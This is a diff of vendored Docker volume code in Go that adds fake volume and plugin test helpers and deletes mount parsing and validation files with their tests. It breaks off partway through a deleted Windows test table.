"github.com/docker/docker/volume/testutils" import ( + "encoding/json" + "errors" "fmt" + "net" + "net/http" + "time" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/volume" ) @@ -24,9 +31,12 @@ func (NoopVolume) Mount(_ string) (string, error) { return "noop", nil } // Unmount unmounts the volume from the container func (NoopVolume) Unmount(_ string) error { return nil } -// Status proivdes low-level details about the volume +// Status provides low-level details about the volume func (NoopVolume) Status() map[string]interface{} { return nil } +// CreatedAt provides the time the volume (directory) was created at +func (NoopVolume) CreatedAt() (time.Time, error) { return time.Now(), nil } + // FakeVolume is a fake volume with a random name type FakeVolume struct { name string @@ -53,8 +63,13 @@ func (FakeVolume) Mount(_ string) (string, error) { return "fake", nil } // Unmount unmounts the volume from the container func (FakeVolume) Unmount(_ string) error { return nil } -// Status proivdes low-level details about the volume -func (FakeVolume) Status() map[string]interface{} { return nil } +// Status provides low-level details about the volume +func (FakeVolume) Status() map[string]interface{} { + return map[string]interface{}{"datakey": "datavalue"} +} + +// CreatedAt provides the time the volume (directory) was created at +func (FakeVolume) CreatedAt() (time.Time, error) { return time.Now(), nil } // FakeDriver is a driver that generates fake volumes type FakeDriver struct { @@ -114,3 +129,99 @@ func (d *FakeDriver) Get(name string) (volume.Volume, error) { func (*FakeDriver) Scope() string { return "local" } + +type fakePlugin struct { + client *plugins.Client + name string + refs int +} + +// MakeFakePlugin creates a fake plugin from the passed in driver +// Note: currently only "Create" is implemented because that's all that's needed +// so far. If you need it to test something else, add it here, but probably you +// shouldn't need to use this except for very specific cases with v2 plugin handling. +func MakeFakePlugin(d volume.Driver, l net.Listener) (plugingetter.CompatPlugin, error) { + c, err := plugins.NewClient(l.Addr().Network()+"://"+l.Addr().String(), nil) + if err != nil { + return nil, err + } + mux := http.NewServeMux() + + mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) { + createReq := struct { + Name string + Opts map[string]string + }{} + if err := json.NewDecoder(r.Body).Decode(&createReq); err != nil { + fmt.Fprintf(w, `{"Err": "%s"}`, err.Error()) + return + } + _, err := d.Create(createReq.Name, createReq.Opts) + if err != nil { + fmt.Fprintf(w, `{"Err": "%s"}`, err.Error()) + return + } + w.Write([]byte("{}")) + }) + + go http.Serve(l, mux) + return &fakePlugin{client: c, name: d.Name()}, nil +} + +func (p *fakePlugin) Client() *plugins.Client { + return p.client +} + +func (p *fakePlugin) Name() string { + return p.name +} + +func (p *fakePlugin) IsV1() bool { + return false +} + +func (p *fakePlugin) ScopedPath(s string) string { + return s +} + +type fakePluginGetter struct { + plugins map[string]plugingetter.CompatPlugin +} + +// NewFakePluginGetter returns a plugin getter for fake plugins +func NewFakePluginGetter(pls ...plugingetter.CompatPlugin) plugingetter.PluginGetter { + idx := make(map[string]plugingetter.CompatPlugin, len(pls)) + for _, p := range pls { + idx[p.Name()] = p + } + return &fakePluginGetter{plugins: idx} +} + +// This ignores the second argument since we only care about volume drivers here, +// there shouldn't be any other kind of plugin in here +func (g *fakePluginGetter) Get(name, _ string, mode int) (plugingetter.CompatPlugin, error) { + p, ok := g.plugins[name] + if !ok { + return nil, errors.New("not found") + } + p.(*fakePlugin).refs += mode + return p, nil +} + +func (g *fakePluginGetter) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, error) { + panic("GetAllByCap shouldn't be called") +} + +func (g *fakePluginGetter) GetAllManagedPluginsByCap(capability string) []plugingetter.CompatPlugin { + panic("GetAllManagedPluginsByCap should not be called") +} + +func (g *fakePluginGetter) Handle(capability string, callback func(string, *plugins.Client)) { + panic("Handle should not be called") +} + +// FakeRefs checks ref count on a fake plugin. +func FakeRefs(p plugingetter.CompatPlugin) int { + // this should panic if something other than a `*fakePlugin` is passed in + return p.(*fakePlugin).refs +} diff --git a/vendor/github.com/docker/docker/volume/validate.go b/vendor/github.com/docker/docker/volume/validate.go deleted file mode 100644 index 27a8c5d5b0..0000000000 --- a/vendor/github.com/docker/docker/volume/validate.go +++ /dev/null @@ -1,125 +0,0 @@ -package volume - -import ( - "errors" - "fmt" - "os" - "path/filepath" - - "github.com/docker/docker/api/types/mount" -) - -var errBindNotExist = errors.New("bind source path does not exist") - -type validateOpts struct { - skipBindSourceCheck bool - skipAbsolutePathCheck bool -} - -func validateMountConfig(mnt *mount.Mount, options ...func(*validateOpts)) error { - opts := validateOpts{} - for _, o := range options { - o(&opts) - } - - if len(mnt.Target) == 0 { - return &errMountConfig{mnt, errMissingField("Target")} - } - - if err := validateNotRoot(mnt.Target); err != nil { - return &errMountConfig{mnt, err} - } - - if !opts.skipAbsolutePathCheck { - if err := validateAbsolute(mnt.Target); err != nil { - return &errMountConfig{mnt, err} - } - } - - switch mnt.Type { - case mount.TypeBind: - if len(mnt.Source) == 0 { - return &errMountConfig{mnt, errMissingField("Source")} - } - // Don't error out just because the propagation mode is not supported on the platform - if opts := mnt.BindOptions; opts != nil { - if len(opts.Propagation) > 0 && len(propagationModes) > 0 { - if _, ok := propagationModes[opts.Propagation]; !ok { - return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)} - } - } - } - if mnt.VolumeOptions != nil { - return &errMountConfig{mnt, errExtraField("VolumeOptions")} - } - - if err := validateAbsolute(mnt.Source); err != nil { - return &errMountConfig{mnt, err} - } - - // Do not allow binding to non-existent path - if !opts.skipBindSourceCheck { - fi, err := os.Stat(mnt.Source) - if err != nil { - if !os.IsNotExist(err) { - return &errMountConfig{mnt, err} - } - return &errMountConfig{mnt, errBindNotExist} - } - if err := validateStat(fi); err != nil { - return &errMountConfig{mnt, err} - } - } - case mount.TypeVolume: - if mnt.BindOptions != nil { - return &errMountConfig{mnt, errExtraField("BindOptions")} - } - - if len(mnt.Source) == 0 && mnt.ReadOnly { - return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")} - } - - if len(mnt.Source) != 0 { - if valid, err := IsVolumeNameValid(mnt.Source); !valid { - if err == nil { - err = errors.New("invalid volume name") - } - return &errMountConfig{mnt, err} - } - } - case mount.TypeTmpfs: - if len(mnt.Source) != 0 { - return &errMountConfig{mnt, errExtraField("Source")} - } - if _, err := ConvertTmpfsOptions(mnt.TmpfsOptions, mnt.ReadOnly); err != nil { - return &errMountConfig{mnt, err} - } - default: - return &errMountConfig{mnt, errors.New("mount type unknown")} - } - return nil -} - -type errMountConfig struct { - mount *mount.Mount - err error -} - -func (e *errMountConfig) Error() string { - return fmt.Sprintf("invalid mount config for type %q: %v", e.mount.Type, e.err.Error()) -} - -func errExtraField(name string) error { - return fmt.Errorf("field %s must not be specified", name) -} -func errMissingField(name string) error { - return fmt.Errorf("field %s must not be empty", name) -} - -func validateAbsolute(p string) error { - p = convertSlash(p) - if filepath.IsAbs(p) { - return nil - } - return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p) -} diff --git a/vendor/github.com/docker/docker/volume/validate_test.go b/vendor/github.com/docker/docker/volume/validate_test.go deleted file mode 100644 index 8732500fc0..0000000000 --- a/vendor/github.com/docker/docker/volume/validate_test.go +++ /dev/null @@ -1,43 +0,0 @@ -package volume - -import ( - "errors" - "io/ioutil" - "os" - "strings" - "testing" - - "github.com/docker/docker/api/types/mount" -) - -func TestValidateMount(t *testing.T) { - testDir, err := ioutil.TempDir("", "test-validate-mount") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(testDir) - - cases := []struct { - input mount.Mount - expected error - }{ - {mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")}, - {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath, Source: "hello"}, nil}, - {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, nil}, - {mount.Mount{Type: mount.TypeBind}, errMissingField("Target")}, - {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath}, errMissingField("Source")}, - {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath, Source: testSourcePath, VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")}, - {mount.Mount{Type: mount.TypeBind, Source: testSourcePath, Target: testDestinationPath}, errBindNotExist}, - {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, nil}, - {mount.Mount{Type: "invalid", Target: testDestinationPath}, errors.New("mount type unknown")}, - } - for i, x := range cases { - err := validateMountConfig(&x.input) - if err == nil && x.expected == nil { - continue - } - if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) { - t.Fatalf("expected %q, got %q, case: %d", x.expected, err, i) - } - } -} diff --git a/vendor/github.com/docker/docker/volume/volume.go b/vendor/github.com/docker/docker/volume/volume.go index f3227fe485..61c8243979 100644 --- a/vendor/github.com/docker/docker/volume/volume.go +++ b/vendor/github.com/docker/docker/volume/volume.go @@ -1,17 +1,7 @@ -package volume +package volume // import "github.com/docker/docker/volume" import ( - "fmt" - "os" - "path/filepath" - "strings" - "syscall" - - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/pkg/idtools" - "github.com/docker/docker/pkg/stringid" - "github.com/opencontainers/runc/libcontainer/label" - "github.com/pkg/errors" + "time" ) // DefaultDriverName is the driver name used for the driver @@ -29,7 +19,7 @@ const ( type Driver interface { // Name returns the name of the volume driver. Name() string - // Create makes a new volume with the given id. + // Create makes a new volume with the given name. Create(name string, opts map[string]string) (Volume, error) // Remove deletes the volume. Remove(vol Volume) (err error) @@ -64,6 +54,8 @@ type Volume interface { Mount(id string) (string, error) // Unmount unmounts the volume when it is no longer in use. Unmount(id string) error + // CreatedAt returns Volume Creation time + CreatedAt() (time.Time, error) // Status returns low-level status information about a volume Status() map[string]interface{} } @@ -75,249 +67,3 @@ type DetailedVolume interface { Scope() string Volume } - -// MountPoint is the intersection point between a volume and a container. It -// specifies which volume is to be used and where inside a container it should -// be mounted. -type MountPoint struct { - // Source is the source path of the mount. - // E.g. `mount --bind /foo /bar`, `/foo` is the `Source`. - Source string - // Destination is the path relative to the container root (`/`) to the mount point - // It is where the `Source` is mounted to - Destination string - // RW is set to true when the mountpoint should be mounted as read-write - RW bool - // Name is the name reference to the underlying data defined by `Source` - // e.g., the volume name - Name string - // Driver is the volume driver used to create the volume (if it is a volume) - Driver string - // Type of mount to use, see `Type` definitions in github.com/docker/docker/api/types/mount - Type mounttypes.Type `json:",omitempty"` - // Volume is the volume providing data to this mountpoint. - // This is nil unless `Type` is set to `TypeVolume` - Volume Volume `json:"-"` - - // Mode is the comma separated list of options supplied by the user when creating - // the bind/volume mount. - // Note Mode is not used on Windows - Mode string `json:"Relabel,omitempty"` // Originally field was `Relabel`" - - // Propagation describes how the mounts are propagated from the host into the - // mount point, and vice-versa. - // See https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt - // Note Propagation is not used on Windows - Propagation mounttypes.Propagation `json:",omitempty"` // Mount propagation string - - // Specifies if data should be copied from the container before the first mount - // Use a pointer here so we can tell if the user set this value explicitly - // This allows us to error out when the user explicitly enabled copy but we can't copy due to the volume being populated - CopyData bool `json:"-"` - // ID is the opaque ID used to pass to the volume driver. - // This should be set by calls to `Mount` and unset by calls to `Unmount` - ID string `json:",omitempty"` - - // Sepc is a copy of the API request that created this mount. - Spec mounttypes.Mount -} - -// Setup sets up a mount point by either mounting the volume if it is -// configured, or creating the source directory if supplied. -func (m *MountPoint) Setup(mountLabel string, rootUID, rootGID int) (string, error) { - if m.Volume != nil { - id := m.ID - if id == "" { - id = stringid.GenerateNonCryptoID() - } - path, err := m.Volume.Mount(id) - if err != nil { - return "", errors.Wrapf(err, "error while mounting volume '%s'", m.Source) - } - m.ID = id - return path, nil - } - if len(m.Source) == 0 { - return "", fmt.Errorf("Unable to setup mount point, neither source nor volume defined") - } - // system.MkdirAll() produces an error if m.Source exists and is a file (not a directory), - if m.Type == mounttypes.TypeBind { - // idtools.MkdirAllNewAs() produces an error if m.Source exists and is a file (not a directory) - // also, makes sure that if the directory is created, the correct remapped rootUID/rootGID will own it - if err := idtools.MkdirAllNewAs(m.Source, 0755, rootUID, rootGID); err != nil { - if perr, ok := err.(*os.PathError); ok { - if perr.Err != syscall.ENOTDIR { - return "", errors.Wrapf(err, "error while creating mount source path '%s'", m.Source) - } - } - } - } - if label.RelabelNeeded(m.Mode) { - if err := label.Relabel(m.Source, mountLabel, label.IsShared(m.Mode)); err != nil { - return "", errors.Wrapf(err, "error setting label on mount source '%s'", m.Source) - } - } - return m.Source, nil -} - -// Path returns the path of a volume in a mount point. -func (m *MountPoint) Path() string { - if m.Volume != nil { - return m.Volume.Path() - } - return m.Source -} - -// ParseVolumesFrom ensures that the supplied volumes-from is valid. -func ParseVolumesFrom(spec string) (string, string, error) { - if len(spec) == 0 { - return "", "", fmt.Errorf("volumes-from specification cannot be an empty string") - } - - specParts := strings.SplitN(spec, ":", 2) - id := specParts[0] - mode := "rw" - - if len(specParts) == 2 { - mode = specParts[1] - if !ValidMountMode(mode) { - return "", "", errInvalidMode(mode) - } - // For now don't allow propagation properties while importing - // volumes from data container. These volumes will inherit - // the same propagation property as of the original volume - // in data container. This probably can be relaxed in future. - if HasPropagation(mode) { - return "", "", errInvalidMode(mode) - } - // Do not allow copy modes on volumes-from - if _, isSet := getCopyMode(mode); isSet { - return "", "", errInvalidMode(mode) - } - } - return id, mode, nil -} - -// ParseMountRaw parses a raw volume spec (e.g. `-v /foo:/bar:shared`) into a -// structured spec. Once the raw spec is parsed it relies on `ParseMountSpec` to -// validate the spec and create a MountPoint -func ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) { - arr, err := splitRawSpec(convertSlash(raw)) - if err != nil { - return nil, err - } - - var spec mounttypes.Mount - var mode string - switch len(arr) { - case 1: - // Just a destination path in the container - spec.Target = arr[0] - case 2: - if ValidMountMode(arr[1]) { - // Destination + Mode is not a valid volume - volumes - // cannot include a mode. eg /foo:rw - return nil, errInvalidSpec(raw) - } - // Host Source Path or Name + Destination - spec.Source = arr[0] - spec.Target = arr[1] - case 3: - // HostSourcePath+DestinationPath+Mode - spec.Source = arr[0] - spec.Target = arr[1] - mode = arr[2] - default: - return nil, errInvalidSpec(raw) - } - - if !ValidMountMode(mode) { - return nil, errInvalidMode(mode) - } - - if filepath.IsAbs(spec.Source) { - spec.Type = mounttypes.TypeBind - } else { - spec.Type = mounttypes.TypeVolume - } - - spec.ReadOnly = !ReadWrite(mode) - - // cannot assume that if a volume driver is passed in that we should set it - if volumeDriver != "" && spec.Type == mounttypes.TypeVolume { - spec.VolumeOptions = &mounttypes.VolumeOptions{ - DriverConfig: &mounttypes.Driver{Name: volumeDriver}, - } - } - - if copyData, isSet := getCopyMode(mode); isSet { - if spec.VolumeOptions == nil { - spec.VolumeOptions = &mounttypes.VolumeOptions{} - } - spec.VolumeOptions.NoCopy = !copyData - } - if HasPropagation(mode) { - spec.BindOptions = &mounttypes.BindOptions{ - Propagation: GetPropagation(mode), - } - } - - mp, err := ParseMountSpec(spec, platformRawValidationOpts...) - if mp != nil { - mp.Mode = mode - } - if err != nil { - err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err) - } - return mp, err -} - -// ParseMountSpec reads a mount config, validates it, and configures a mountpoint from it. -func ParseMountSpec(cfg mounttypes.Mount, options ...func(*validateOpts)) (*MountPoint, error) { - if err := validateMountConfig(&cfg, options...); err != nil { - return nil, err - } - mp := &MountPoint{ - RW: !cfg.ReadOnly, - Destination: clean(convertSlash(cfg.Target)), - Type: cfg.Type, - Spec: cfg, - } - - switch cfg.Type { - case mounttypes.TypeVolume: - if cfg.Source == "" { - mp.Name = stringid.GenerateNonCryptoID() - } else { - mp.Name = cfg.Source - } - mp.CopyData = DefaultCopyMode - - if cfg.VolumeOptions != nil { - if cfg.VolumeOptions.DriverConfig != nil { - mp.Driver = cfg.VolumeOptions.DriverConfig.Name - } - if cfg.VolumeOptions.NoCopy { - mp.CopyData = false - } - } - case mounttypes.TypeBind: - mp.Source = clean(convertSlash(cfg.Source)) - if cfg.BindOptions != nil { - if len(cfg.BindOptions.Propagation) > 0 { - mp.Propagation = cfg.BindOptions.Propagation - } - } - case mounttypes.TypeTmpfs: - // NOP - } - return mp, nil -} - -func errInvalidMode(mode string) error { - return fmt.Errorf("invalid mode: %v", mode) -} - -func errInvalidSpec(spec string) error { - return fmt.Errorf("invalid volume specification: '%s'", spec) -} diff --git a/vendor/github.com/docker/docker/volume/volume_copy_unix.go b/vendor/github.com/docker/docker/volume/volume_copy_unix.go deleted file mode 100644 index ad66e17637..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_copy_unix.go +++ /dev/null @@ -1,8 +0,0 @@ -// +build !windows - -package volume - -const ( - // DefaultCopyMode is the copy mode used by default for normal/named volumes - DefaultCopyMode = true -) diff --git a/vendor/github.com/docker/docker/volume/volume_copy_windows.go b/vendor/github.com/docker/docker/volume/volume_copy_windows.go deleted file mode 100644 index 798638c878..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_copy_windows.go +++ /dev/null @@ -1,6 +0,0 @@ -package volume - -const ( - // DefaultCopyMode is the copy mode used by default for normal/named volumes - DefaultCopyMode = false -) diff --git a/vendor/github.com/docker/docker/volume/volume_linux.go b/vendor/github.com/docker/docker/volume/volume_linux.go deleted file mode 100644 index d4b4d800b2..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_linux.go +++ /dev/null @@ -1,56 +0,0 @@ -// +build linux - -package volume - -import ( - "fmt" - "strings" - - mounttypes "github.com/docker/docker/api/types/mount" -) - -// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string -// for mount(2). -func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) { - var rawOpts []string - if readOnly { - rawOpts = append(rawOpts, "ro") - } - - if opt != nil && opt.Mode != 0 { - rawOpts = append(rawOpts, fmt.Sprintf("mode=%o", opt.Mode)) - } - - if opt != nil && opt.SizeBytes != 0 { - // calculate suffix here, making this linux specific, but that is - // okay, since API is that way anyways. - - // we do this by finding the suffix that divides evenly into the - // value, returing the value itself, with no suffix, if it fails. - // - // For the most part, we don't enforce any semantic to this values. - // The operating system will usually align this and enforce minimum - // and maximums. - var ( - size = opt.SizeBytes - suffix string - ) - for _, r := range []struct { - suffix string - divisor int64 - }{ - {"g", 1 << 30}, - {"m", 1 << 20}, - {"k", 1 << 10}, - } { - if size%r.divisor == 0 { - size = size / r.divisor - suffix = r.suffix - break - } - } - - rawOpts = append(rawOpts, fmt.Sprintf("size=%d%s", size, suffix)) - } - return strings.Join(rawOpts, ","), nil -} diff --git a/vendor/github.com/docker/docker/volume/volume_linux_test.go b/vendor/github.com/docker/docker/volume/volume_linux_test.go deleted file mode 100644 index 40ce5525a3..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_linux_test.go +++ /dev/null @@ -1,51 +0,0 @@ -// +build linux - -package volume - -import ( - "strings" - "testing" - - mounttypes "github.com/docker/docker/api/types/mount" -) - -func TestConvertTmpfsOptions(t *testing.T) { - type testCase struct { - opt mounttypes.TmpfsOptions - readOnly bool - expectedSubstrings []string - unexpectedSubstrings []string - } - cases := []testCase{ - { - opt: mounttypes.TmpfsOptions{SizeBytes: 1024 * 1024, Mode: 0700}, - readOnly: false, - expectedSubstrings: []string{"size=1m", "mode=700"}, - unexpectedSubstrings: []string{"ro"}, - }, - { - opt: mounttypes.TmpfsOptions{}, - readOnly: true, - expectedSubstrings: []string{"ro"}, - unexpectedSubstrings: []string{}, - }, - } - for _, c := range cases { - data, err := ConvertTmpfsOptions(&c.opt, c.readOnly) - if err != nil { - t.Fatalf("could not convert %+v (readOnly: %v) to string: %v", - c.opt, c.readOnly, err) - } - t.Logf("data=%q", data) - for _, s := range c.expectedSubstrings { - if !strings.Contains(data, s) { - t.Fatalf("expected substring: %s, got %v (case=%+v)", s, data, c) - } - } - for _, s := range c.unexpectedSubstrings { - if strings.Contains(data, s) { - t.Fatalf("unexpected substring: %s, got %v (case=%+v)", s, data, c) - } - } - } -} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux.go deleted file mode 100644 index 1de57ab52b..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_propagation_linux.go +++ /dev/null @@ -1,47 +0,0 @@ -// +build linux - -package volume - -import ( - "strings" - - mounttypes "github.com/docker/docker/api/types/mount" -) - -// DefaultPropagationMode defines what propagation mode should be used by -// default if user has not specified one explicitly. -// propagation modes -const DefaultPropagationMode = mounttypes.PropagationRPrivate - -var propagationModes = map[mounttypes.Propagation]bool{ - mounttypes.PropagationPrivate: true, - mounttypes.PropagationRPrivate: true, - mounttypes.PropagationSlave: true, - mounttypes.PropagationRSlave: true, - mounttypes.PropagationShared: true, - mounttypes.PropagationRShared: true, -} - -// GetPropagation extracts and returns the mount propagation mode. If there -// are no specifications, then by default it is "private". -func GetPropagation(mode string) mounttypes.Propagation { - for _, o := range strings.Split(mode, ",") { - prop := mounttypes.Propagation(o) - if propagationModes[prop] { - return prop - } - } - return DefaultPropagationMode -} - -// HasPropagation checks if there is a valid propagation mode present in -// passed string. Returns true if a valid propagation mode specifier is -// present, false otherwise. -func HasPropagation(mode string) bool { - for _, o := range strings.Split(mode, ",") { - if propagationModes[mounttypes.Propagation(o)] { - return true - } - } - return false -} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go deleted file mode 100644 index 46d0265062..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go +++ /dev/null @@ -1,65 +0,0 @@ -// +build linux - -package volume - -import ( - "strings" - "testing" -) - -func TestParseMountRawPropagation(t *testing.T) { - var ( - valid []string - invalid map[string]string - ) - - valid = []string{ - "/hostPath:/containerPath:shared", - "/hostPath:/containerPath:rshared", - "/hostPath:/containerPath:slave", - "/hostPath:/containerPath:rslave", - "/hostPath:/containerPath:private", - "/hostPath:/containerPath:rprivate", - "/hostPath:/containerPath:ro,shared", - "/hostPath:/containerPath:ro,slave", - "/hostPath:/containerPath:ro,private", - "/hostPath:/containerPath:ro,z,shared", - "/hostPath:/containerPath:ro,Z,slave", - "/hostPath:/containerPath:Z,ro,slave", - "/hostPath:/containerPath:slave,Z,ro", - "/hostPath:/containerPath:Z,slave,ro", - "/hostPath:/containerPath:slave,ro,Z", - "/hostPath:/containerPath:rslave,ro,Z", - "/hostPath:/containerPath:ro,rshared,Z", - "/hostPath:/containerPath:ro,Z,rprivate", - } - invalid = map[string]string{ - "/path:/path:ro,rshared,rslave": `invalid mode`, - "/path:/path:ro,z,rshared,rslave": `invalid mode`, - "/path:shared": "invalid volume specification", - "/path:slave": "invalid volume specification", - "/path:private": "invalid volume specification", - "name:/absolute-path:shared": "invalid volume specification", - "name:/absolute-path:rshared": "invalid volume specification", - "name:/absolute-path:slave": "invalid volume specification", - "name:/absolute-path:rslave": "invalid volume specification", - "name:/absolute-path:private": "invalid volume specification", - "name:/absolute-path:rprivate": "invalid volume specification", - } - - for _, path := range valid { - if _, err := ParseMountRaw(path, "local"); err != nil { - t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err) - } - } - - for path, expectedError := range invalid { - if _, err := ParseMountRaw(path, "local"); err == nil { - t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err %v", path, err) - } else { - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error()) - } - } - } -} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go b/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go deleted file mode 100644 index 7311ffc2e0..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go +++ /dev/null @@ -1,24 +0,0 @@ -// +build !linux - -package volume - -import mounttypes "github.com/docker/docker/api/types/mount" - -// DefaultPropagationMode is used only in linux. In other cases it returns -// empty string. -const DefaultPropagationMode mounttypes.Propagation = "" - -// propagation modes not supported on this platform. -var propagationModes = map[mounttypes.Propagation]bool{} - -// GetPropagation is not supported. Return empty string. -func GetPropagation(mode string) mounttypes.Propagation { - return DefaultPropagationMode -} - -// HasPropagation checks if there is a valid propagation mode present in -// passed string. Returns true if a valid propagation mode specifier is -// present, false otherwise. -func HasPropagation(mode string) bool { - return false -} diff --git a/vendor/github.com/docker/docker/volume/volume_test.go b/vendor/github.com/docker/docker/volume/volume_test.go deleted file mode 100644 index 54df38053f..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_test.go +++ /dev/null @@ -1,269 +0,0 @@ -package volume - -import ( - "io/ioutil" - "os" - "runtime" - "strings" - "testing" - - "github.com/docker/docker/api/types/mount" -) - -func TestParseMountRaw(t *testing.T) { - var ( - valid []string - invalid map[string]string - ) - - if runtime.GOOS == "windows" { - valid = []string{ - `d:\`, - `d:`, - `d:\path`, - `d:\path with space`, - // TODO Windows post TP5 - readonly support `d:\pathandmode:ro`, - `c:\:d:\`, - `c:\windows\:d:`, - `c:\windows:d:\s p a c e`, - `c:\windows:d:\s p a c e:RW`, - `c:\program files:d:\s p a c e i n h o s t d i r`, - `0123456789name:d:`, - `MiXeDcAsEnAmE:d:`, - `name:D:`, - `name:D::rW`, - `name:D::RW`, - // TODO Windows post TP5 - readonly support `name:D::RO`, - `c:/:d:/forward/slashes/are/good/too`, - // TODO Windows post TP5 - readonly support `c:/:d:/including with/spaces:ro`, - `c:\Windows`, // With capital - `c:\Program Files (x86)`, // With capitals and brackets - } - invalid = map[string]string{ - ``: "invalid volume specification: ", - `.`: "invalid volume specification: ", - `..\`: "invalid volume specification: ", - `c:\:..\`: "invalid volume specification: ", - `c:\:d:\:xyzzy`: "invalid volume specification: ", - `c:`: "cannot be `c:`", - `c:\`: "cannot be `c:`", - `c:\notexist:d:`: `source path does not exist`, - `c:\windows\system32\ntdll.dll:d:`: `source path must be a directory`, - `name<:d:`: `invalid volume specification`, - `name>:d:`: `invalid volume specification`, - `name::d:`: `invalid volume specification`, - `name":d:`: `invalid volume specification`, - `name\:d:`: `invalid volume specification`, - `name*:d:`: `invalid volume specification`, - `name|:d:`: `invalid volume specification`, - `name?:d:`: `invalid volume specification`, - `name/:d:`: `invalid volume specification`, - `d:\pathandmode:rw`: `invalid volume specification`, - `con:d:`: `cannot be a reserved word for Windows filenames`, - `PRN:d:`: `cannot be a reserved word for Windows filenames`, - `aUx:d:`: `cannot be a reserved word for Windows filenames`, - `nul:d:`: `cannot be a reserved word for Windows filenames`, - `com1:d:`: `cannot be a reserved word for Windows filenames`, - `com2:d:`: `cannot be a reserved word for Windows filenames`, - `com3:d:`: `cannot be a reserved word for Windows filenames`, - `com4:d:`: `cannot be a reserved word for Windows filenames`, - `com5:d:`: `cannot be a reserved word for Windows filenames`, - `com6:d:`: `cannot be a reserved word for Windows filenames`, - `com7:d:`: `cannot be a reserved word for Windows filenames`, - `com8:d:`: `cannot be a reserved word for Windows filenames`, - `com9:d:`: `cannot be a reserved word for Windows filenames`, - `lpt1:d:`: `cannot be a reserved word for Windows filenames`, - `lpt2:d:`: `cannot be a reserved word for Windows filenames`, - `lpt3:d:`: `cannot be a reserved word for Windows filenames`, - `lpt4:d:`: `cannot be a reserved word for Windows filenames`, - `lpt5:d:`: `cannot be a reserved word for Windows filenames`, - `lpt6:d:`: `cannot be a reserved word for Windows filenames`, - `lpt7:d:`: `cannot be a reserved word for Windows filenames`, - `lpt8:d:`: `cannot be a reserved word for Windows filenames`, - `lpt9:d:`: `cannot be a reserved word for Windows filenames`, - `c:\windows\system32\ntdll.dll`: `Only directories can be mapped on this platform`, - } - - } else { - valid = []string{ - "/home", - "/home:/home", - "/home:/something/else", - "/with space", - "/home:/with space", - "relative:/absolute-path", - "hostPath:/containerPath:ro", - "/hostPath:/containerPath:rw", - "/rw:/ro", - } - invalid = map[string]string{ - "": "invalid volume specification", - "./": "mount path must be absolute", - "../": "mount path must be absolute", - "/:../": "mount path must be absolute", - "/:path": "mount path must be absolute", - ":": "invalid volume specification", - "/tmp:": "invalid volume specification", - ":test": "invalid volume specification", - ":/test": "invalid volume specification", - "tmp:": "invalid volume specification", - ":test:": "invalid volume specification", - "::": "invalid volume specification", - ":::": "invalid volume specification", - "/tmp:::": "invalid volume specification", - ":/tmp::": "invalid volume specification", - "/path:rw": "invalid volume specification", - "/path:ro": "invalid volume specification", - "/rw:rw": "invalid volume specification", - "path:ro": "invalid volume specification", - "/path:/path:sw": `invalid mode`, - "/path:/path:rwz": `invalid mode`, - } - } - - for _, path := range valid { - if _, err := ParseMountRaw(path, "local"); err != nil { - t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err) - } - } - - for path, expectedError := range invalid { - if mp, err := ParseMountRaw(path, "local"); err == nil { - t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err '%v' - MP: %v", path, err, mp) - } else { - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error()) - } - } - } -} - -// testParseMountRaw is a structure used by TestParseMountRawSplit for -// specifying test cases for the ParseMountRaw() function. -type testParseMountRaw struct { - bind string - driver string - expDest string - expSource string - expName string - expDriver string - expRW bool - fail bool -} - -func TestParseMountRawSplit(t *testing.T) { - var cases []testParseMountRaw - if runtime.GOOS == "windows" { - cases = []testParseMountRaw{ - {`c:\:d:`, "local", `d:`, `c:\`, ``, "", true, false}, - {`c:\:d:\`, "local", `d:\`, `c:\`, ``, "", true, false}, - // TODO Windows post TP5 - Add readonly support {`c:\:d:\:ro`, "local", `d:\`, `c:\`, ``, "", false, false}, - {`c:\:d:\:rw`, "local", `d:\`, `c:\`, ``, "", true, false}, - {`c:\:d:\:foo`, "local", `d:\`, `c:\`, 